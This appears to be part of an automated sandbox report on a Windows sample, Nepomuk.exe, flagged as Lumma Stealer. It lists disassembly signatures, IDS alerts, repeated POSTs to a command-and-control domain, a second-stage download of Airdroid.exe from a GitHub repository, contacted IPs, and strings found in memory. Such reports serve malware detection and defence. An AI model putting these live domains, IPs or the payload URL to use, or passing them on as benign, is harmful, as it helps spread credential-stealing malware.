                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax]0_2_03593269
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], ebx0_2_03573210
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+000000F0h]0_2_03573210
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [eax], cx0_2_03573210
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h0_2_03580AE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [edi], cx0_2_03580AE0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_03582280
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+7A0F92D2h]0_2_0355C150
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+0000027Ch]0_2_03572110
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then push esi0_2_03576933
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [edx], cl0_2_0357F18A
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+5C150C3Ch]0_2_0358081C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp word ptr [esi+edi+02h], 0000h0_2_0358081C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov word ptr [edi], cx0_2_0358081C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+10h]0_2_03592800
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+08h]0_2_03592800
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+04h]0_2_03592800
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [edx+ebx*8], A0E666EBh0_2_035958C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]0_2_0355AF10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0356DF0E
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], edi0_2_0356DF0E
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov dword ptr [esp+04h], edi0_2_0356DF0E
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-349D2938h]0_2_0355C7C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ebx, byte ptr [eax+esi]0_2_0355C7C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then jmp eax0_2_0356DF8F
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+10h]0_2_035806C0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_03551EF0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+08h]0_2_0357FE84
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h0_2_03577EA0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h0_2_03577EA0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov edx, esi0_2_03575570
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], BEB994C9h0_2_0358151C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+14h]0_2_03599D10
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [edx]0_2_03551D20
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then mov byte ptr [eax], cl0_2_0356D5F0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-70h]0_2_03595D90
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]0_2_035805AA
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx+0D993EE3h]0_2_0357D49C
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_03559CB0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_03559CB0

                    Networking

                    Source: Network traffic, Suricata IDS: 2061393 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soursopsf .run) : 192.168.2.4:57934 -> 1.1.1.1:53
                    Source: Network traffic, Suricata IDS: 2061395 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (changeaie .top) : 192.168.2.4:49666 -> 1.1.1.1:53
                    Source: Network traffic, Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49716 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49718 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49717 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49727 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49721 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49719 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2061396 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) : 192.168.2.4:49720 -> 104.21.42.7:443
                    Source: global traffic, TCP traffic: 185.121.233.152 ports 0,1,2,5,8,28150
                    Source: global traffic, TCP traffic: 192.168.2.4:49731 -> 185.121.233.152:28150
                    Source: global traffic, HTTP traffic detected:
                        GET /DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exe HTTP/1.1
                        Connection: Keep-Alive
                        Host: github.com
                    Source: global traffic, HTTP traffic detected:
                        GET /DLMKER/LeryStable/refs/heads/main/Airdroid.exe HTTP/1.1
                        Connection: Keep-Alive
                        Host: raw.githubusercontent.com
                    Source: Joe Sandbox View, IP Address: 46.8.232.106 46.8.232.106
                    Source: Joe Sandbox View, IP Address: 140.82.114.3 140.82.114.3
                    Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49716 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49718 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 185.199.111.133:443
                    Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49717 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49721 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 140.82.114.3:443
                    Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49719 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49720 -> 104.21.42.7:443
                    Source: Network traffic, Suricata IDS: 2822537 - Severity 1 - ETPRO EXPLOIT Possible Win32k Elevation of Privilege Vulnerability (CVE-2016-7191) : 185.199.111.133:443 -> 192.168.2.4:49729
                    Source: global traffic, HTTP traffic detected:
                        POST /geps HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                        Content-Length: 59
                        Host: changeaie.top
                    Source: global traffic, HTTP traffic detected:
                        POST /geps HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=YO6t203zj
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                        Content-Length: 19584
                        Host: changeaie.top
                    Source: global traffic, HTTP traffic detected:
                        POST /geps HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=n4C6WMx76Gd
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                        Content-Length: 8751
                        Host: changeaie.top
                    Source: global traffic, HTTP traffic detected:
                        POST /geps HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=0bt8K4rlv3dljC
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                        Content-Length: 20419
                        Host: changeaie.top
                    Source: global traffic, HTTP traffic detected:
                        POST /geps HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=jzp11Wf7t4MM3xSM1Ul
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                        Content-Length: 2436
                        Host: changeaie.top
                    Source: global traffic, HTTP traffic detected:
                        POST /geps HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: multipart/form-data; boundary=vrrlA1O6WzAn3KQ4Ep0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                        Content-Length: 549398
                        Host: changeaie.top
                    Source: global traffic, HTTP traffic detected:
                        POST /geps HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                        Content-Length: 97
                        Host: changeaie.top
                    Source: unknown, TCP traffic detected without corresponding DNS query: 46.8.232.106
                    Source: unknown, TCP traffic detected without corresponding DNS query: 185.121.233.152
                    Source: unknown, TCP traffic detected without corresponding DNS query: 46.8.236.61
                    Source: unknown, TCP traffic detected without corresponding DNS query: 147.45.196.157
                    Source: global traffic, DNS traffic detected: DNS query: quantyu.bet
                    Source: global traffic, DNS traffic detected: DNS query: soursopsf.run
                    Source: global traffic, DNS traffic detected: DNS query: changeaie.top
                    Source: global traffic, DNS traffic detected: DNS query: github.com
                    Source: global traffic, DNS traffic detected: DNS query: raw.githubusercontent.com
                    Source: unknown, HTTP traffic detected:
                        POST /geps HTTP/1.1
                        Connection: Keep-Alive
                        Content-Type: application/x-www-form-urlencoded
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                        Content-Length: 59
                        Host: changeaie.top
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                    Source: powershell.exe, 00000008.00000002.1537699345.00000000055F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1707394033.0000000004E01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1790189763.0000000004801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: Nepomuk.exe, 00000000.00000003.1471546361.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466853863.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350444440.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350187617.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1290239149.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1392168310.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472424116.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391276188.00000000016EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/
                    Source: Nepomuk.exe, 00000000.00000003.1391276188.0000000001700000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1339797197.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1306226789.0000000001710000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350444440.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350187617.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1318065628.0000000001711000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1338586135.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.0000000001700000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472403308.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1317715150.0000000001710000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1317678655.0000000001708000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1329240431.0000000001711000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1338567920.0000000001711000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391276188.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1305853226.0000000001710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/geps
                    Source: Nepomuk.exe, 00000000.00000003.1317696538.000000000171D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/geps5
                    Source: Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepsCO.
                    Source: Nepomuk.exe, 00000000.00000002.1472403308.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391276188.00000000016EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepsO
                    Source: Nepomuk.exe, 00000000.00000003.1350444440.0000000001700000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepsZ
                    Source: Nepomuk.exe, 00000000.00000003.1339797197.00000000016F3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350444440.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350187617.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1338586135.00000000016F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepse0R
                    Source: Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepsj
                    Source: Nepomuk.exe, 00000000.00000003.1329303038.000000000171D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepslite5
                    Source: Nepomuk.exe, 00000000.00000003.1339975888.0000000001679000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1339840144.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471333634.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350308080.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391450964.000000000167A000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000167A000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1289528214.0000000001682000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/gepsoh
                    Source: Nepomuk.exe, 00000000.00000003.1392168310.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1359304340.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391276188.00000000016EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://changeaie.top/n
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                    Source: powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Nepomuk.exe, 00000000.00000003.1294044299.0000000003F28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                    Source: Nepomuk.exe, 00000000.00000003.1471465153.00000000016D1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472362154.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/
                    Source: Nepomuk.exe, 00000000.00000003.1471465153.00000000016D1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472362154.00000000016D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DLMKER/Ler
                    Source: Nepomuk.exe, 00000000.00000002.1471840369.000000000135B000.00000004.00000010.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472501025.0000000001713000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466407094.000000000170C000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exe
                    Source: Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exeK&
                    Source: Nepomuk.exe, 00000000.00000002.1472501025.0000000001713000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466407094.000000000170C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exei
                    Source: Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000169F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/DLMKER/LeryStable/raw/refs/heads/main/Airdroid.exetSbTskZp5lIVJvOyFmmmUkUmI7
                    Source: powershell.exe, 0000000E.00000002.1790189763.0000000004952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: Nepomuk.exe, 00000000.00000003.1320111232.000000000171C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: powershell.exe, 00000008.00000002.1539712265.0000000006656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1715113069.0000000005E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1799595112.0000000005863000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: Nepomuk.exe, 00000000.00000003.1471096945.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472383126.00000000016E3000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466512578.00000000016DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/$
                    Source: Nepomuk.exe, 00000000.00000003.1466158005.0000000003F53000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466808297.00000000016FE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471485052.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472145956.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471333634.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1470890253.0000000003F87000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.0000000001676000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466457237.00000000016EE000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1473525877.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000167A000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472424116.00000000016FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/DLMKER/LeryStable/refs/heads/main/Airdroid.exe
                    Source: Nepomuk.exe, 00000000.00000003.1466589569.0000000001676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/DLMKER/LeryStable/refs/heads/main/Airdroid.exe&
                    Source: Nepomuk.exe, 00000000.00000003.1471485052.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472145956.000000000165E000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000165E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/DLMKER/LeryStable/refs/heads/main/Airdroid.exeLeryStable/refs/head
                    Source: Nepomuk.exe, 00000000.00000003.1466158005.0000000003FEE000.00000004.00000800.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466378385.0000000003FEF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com:443/DLMKER/LeryStable/refs/heads/main/Airdroid.exe
                    Source: Nepomuk.exe, 00000000.00000003.1319806754.000000000403D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
